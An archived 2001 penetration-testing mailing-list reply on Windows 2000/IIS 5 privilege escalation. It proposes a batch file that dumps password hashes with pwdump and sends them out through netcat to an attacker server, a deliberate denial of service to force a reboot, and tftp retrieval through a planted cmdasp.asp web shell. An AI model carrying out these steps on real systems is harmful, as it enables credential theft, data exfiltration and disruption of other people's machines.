Penetration Testing mailing list archives
Re: [PEN-TEST] Expand right under Win2K
From: Complx1 * <complx1 () HUSHMAIL COM>
Date: Wed, 10 Jan 2001 19:33:30 -0800
Apologies for my lack of attention to the question's title. Win2k: hk only works on NT 4.0. How about a theoretical, untested scenario then? Assuming the target is Win2k with IIS v5, and depending on FAT vs. NTFS and firewall ACL conditions, something along the lines of this might be possible.

Assuming DoS conditions are permitted in the test, what are your thoughts on wrapping a payload package of pwdump, netcat, and a batch file? Write a small batch that dumps the hash to a text file, then nc -v YOURSERVER port < hashdump.txt. Put the payload in the startup method of your choice, or perhaps work it into a triggered mechanism (but then Unicode wouldn't do well for that, only for the primary intrusion). DoS the box, notify the admin to reboot, open your netcat listener, and when the box comes back up, maybe a hash will be dumped into your netcat port =). Then let the CPU cycles roll.

I've tested this method several times on a LAN with success. No Unicode, however, only registry methods and the like, so I can't say how a remote test would turn out.

Last-minute thought: if you made pwdump execute on startup and let it reside on the disk, you could trigger the hash file retrieval at will. For instance, maybe you left your cmdasp.asp there and now the box has been DoS'd; tftp the results of the file to yourself.

.complx`1

At Wed, 10 Jan 2001 20:26:45 +0100, Tamas Foldi <geza () KAPU HU> wrote:
3. HK doesn't work under win2k (it produced a "permission denied" message); win2k has never been vulnerable to spoofed LPC port requests.